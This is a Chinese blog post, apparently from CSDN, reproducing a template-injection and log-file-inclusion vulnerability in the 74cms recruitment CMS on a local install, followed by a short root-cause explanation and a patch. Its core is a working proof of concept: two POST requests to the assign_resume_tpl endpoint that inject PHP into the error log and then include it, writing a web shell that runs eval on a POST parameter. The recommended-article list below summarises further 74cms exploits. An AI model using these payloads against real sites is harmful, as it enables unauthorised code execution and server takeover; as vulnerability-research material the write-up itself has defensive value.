74cms

最新推荐文章于 2024-07-25 10:08:48 发布
最新推荐文章于 2024-07-25 10:08:48 发布
阅读量1.6k 收藏
点赞数
分类专栏: web 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52469895/article/details/124096050
版权

web安全

下载好源码

php网站源码下载_php招聘网站源码_php网站模版_骑士cms人才系统

然后安装,安装好之后

发送poc:

http://127.0.0.1/74cms//index.php?m=home&a=assign_resume_tpl

POST: variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

看到它爆错了

根据报错查看日志:

路径为WWW\74cms\upload\data\Runtime\Logs\Home

文件包含

发送poc: http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl

POST: variable=1&tpl=data/Runtime/Logs/Home/21_10_10.log(日志文件名为日期)

成功写下shell

漏洞原理

在文件/Application/Common/Controller/BaseController.class.php中,assign_resume_tpl方法中判断不严格,导致了模板注入漏洞。

修复方案

74cms\ThinkPHP\Library\Think\View.class.php

if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);

代码注释替换为

if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_'));

小生迷途知返
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms v5.0.1漏洞
weixin_56049038的博客
04-13 2731
摘 要 远程连接命令/代码执行漏洞,简称RCE漏洞。RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口...
74CMS的RCE挖掘思路
include_voidmain的博客
04-06 2723
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
74CMS漏洞复现
小小猪的博客
12-01 4174
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
74CMS模版注入漏洞复现
sGanYu
04-15 1710
骑士cms人才系统,是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 该漏洞影响版本: CMS < 6.0.48 漏洞复现 url: http://目标IP地址/index.php?m=home&a=assign_resume_tpl 以post方.
74cms前台getshell漏洞
qq_51922767的博客
12-09 990
74cms前台getshell漏洞
安鸾CMS系列之74CMS
柠鹿的轨迹
02-22 498
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本文首发于涂寐’s Blogs:https://0xtlu.github.io/ 题目URL:http://106.15.50.112:8019/ 提示:flag在服务器根目录下,文件名为this_is_flag Powered by 74cms v4.2.3
骑士 74CMS V3.4漏洞
weixin_61842894的博客
02-07 803
骑士 74CMS V3.4
74cms3.0 SQL注入
Z_l123的博客
03-08 420
登录后进入个人资料 填写后,保存并抓包 将抓到的包按如下修改,关闭抓包 结果 md5验证
74cms v5.0.1 漏洞复现
p_lang的博客
04-30 3181
一、环境搭建 这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。 1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html 2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。 3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。 OK,
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
宝鸡第一人才网 74CMS发布
01-09
【标题】"宝鸡第一人才网 74CMS发布"指的是基于74CMS内容管理系统搭建的在线招聘网站。74CMS是一款专为构建人才招聘类网站而设计的开源系统,它通常包含一系列的功能模块,用于发布招聘信息、管理求职者简历、实现...
74cmsv6.0.20.zip
07-23
【标题】"74cmsv6.0.20.zip" 指的是一个特定版本的74CMS74内容管理系统)的压缩包文件,版本号为6.0.20。74CMS通常是一个基于PHP开发的开源网站内容管理系统,用于构建和管理网站,尤其适用于快速搭建和维护新闻、...
74cms 南阳人才网 模板
01-09
74cms 南阳人才网模板】是一个专为南阳地区设计的人力资源网站模板,基于74cms内容管理系统构建,旨在提供高效、便捷的在线招聘与求职服务。74cms是一个广泛应用于各类网站开发的开源平台,尤其适合构建信息展示类...
“微软蓝屏”事件暴露网络安全哪些问题
sheji888的专栏
07-23 386
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
微软蓝屏事件:网络安全的多维挑战与应对策略
sinner小屋
07-23 747
微软蓝屏事件,这一近期震动全球科技界的重大事件,起因于一次看似平常的软件更新。美国电脑安全技术公司“众击”发布的更新包中隐藏着一个致命的“缺陷”,这个缺陷如同潜伏的病毒,一旦被激活,便在全球范围内引发了连锁反应。近850万台设备,从个人电脑到关键行业的服务器,无一幸免地遭遇了系统崩溃,屏幕上只剩下一片冰冷的蓝色。这一事件不仅影响了日常办公,更是波及了航空、医疗、传媒等关键领域,造成了航班延误、医疗服务中断、信息传播受阻等一系列严重后果。
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 825
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
“微软蓝屏”事件暴露了网络安全哪些问题?
Envyᥫᩣ的博客
07-23 460
首先,不同行业之间应该建立更加紧密的联系和合作机制,共同分享信息和经验,提高网络安全防范能力。其次,政府和企业应该加强对网络安全的投资和支持,推动网络安全技术的创新和发展。最后,政府和企业应该加强对软件更新的监管和管理,建立更加完善的法律法规和标准,以确保软件更新的安全和可靠性。那么,如何提高系统的韧性和应急响应能力呢?首先,企业应该建立完善的应急预案和应急响应机制,包括备份系统、故障诊断和修复等步骤,以快速应对系统故障。最后,企业应该加强员工的安全意识和培训,提高员工的应急响应能力和自我保护意识。
"74CMS_v5.0.1 后台 RCE 漏洞分析及利用条件简介
74CMS_v5.0.1后台RCE漏洞分析 在本次漏洞分析中,我们将对74CMS_v5.0.1后台RCE漏洞进行深入分析。该漏洞主要存在于后台管理账户中,需要登录后台管理账户才能够实现RCE。但是在漏洞的挖掘思路以及利用过程中,我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值